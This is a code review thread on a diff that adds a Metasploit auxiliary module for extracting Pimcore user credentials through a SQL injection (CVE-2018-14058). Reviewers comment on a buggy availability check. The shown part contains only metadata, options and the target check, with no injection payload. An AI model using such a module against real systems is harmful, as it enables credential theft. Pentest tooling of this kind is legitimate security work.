modules/auxiliary/sqli/oracle/pimcore_list_creds.rb

```diff
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Pimcore List Credentials',
+      'Description'    => %q{
+        This module extracts the usernames and hashed passwords of all users of the Pimcore web service by exploiting a SQL injection vulnerability in Pimcore's REST API.
+      },
+      'Author'         => [ 'Thongchai Silpavarangkura', # PoC
+                            'N. Rai-Ngoen',              # PoC
+                            'Shelby Pace'                # Metasploit Module
+                          ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+                            [ 'CVE', '2018-14058' ],
+                            [ 'EDB', '45208' ]
+                          ],
+      'DisclosureDate' => 'Aug 13, 2018'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The base path to pimcore', '/' ]),
+        OptString.new('APIKEY', [ true, 'The valid API key for Pimcore REST API', '' ])
+      ])
+  end
+
+  def available?
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path)
+    )
+
+    false unless res && res.body.include?('pimcore')
+
+    true
```

Comment:
Would probably be cleaner to do something like:

```
    (res && res.body.include?('pimcore')) ? true : false
```

Reply:
Or just `res && res.body.include?('pimcore')`, I think.